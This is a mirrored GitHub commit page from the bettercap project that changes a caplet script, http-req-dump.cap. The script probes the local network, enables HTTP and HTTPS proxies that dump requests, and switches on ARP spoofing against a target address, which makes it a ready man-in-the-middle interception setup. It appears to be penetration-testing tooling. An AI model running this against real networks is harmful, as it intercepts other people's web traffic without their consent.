mirror of
https://github.com/bettercap/bettercap
synced 2025-08-20 21:43:18 -07:00
balls
This commit is contained in:
parent
c03c943ddc
commit
a1d96165cf
2 changed files with 39 additions and 1 deletions
|
@ -2,22 +2,26 @@
|
|||
#
|
||||
# sudo ./bettercap-ng -caplet caplets/http-req-dump.cap -eval "set arp.spoof.targets 192.168.1.64"
|
||||
|
||||
# to make it less verbose
|
||||
# events.stream off
|
||||
|
||||
# discover a few hosts
|
||||
net.probe on
|
||||
sleep 1
|
||||
net.probe off
|
||||
|
||||
# uncomment to enable sniffing too
|
||||
# set net.sniff.verbose false
|
||||
# set net.sniff.local true
|
||||
# set net.sniff.filter tcp port 443
|
||||
# net.sniff on
|
||||
|
||||
# we'll use this proxy script to dump requests
|
||||
set https.proxy.script caplets/http-req-dump.js
|
||||
set http.proxy.script caplets/http-req-dump.js
|
||||
clear
|
||||
|
||||
# go ^_^
|
||||
http.proxy on
|
||||
https.proxy on
|
||||
arp.spoof on
|
||||
|
||||
|
|
Loading…
Add table
Add a link
Reference in a new issue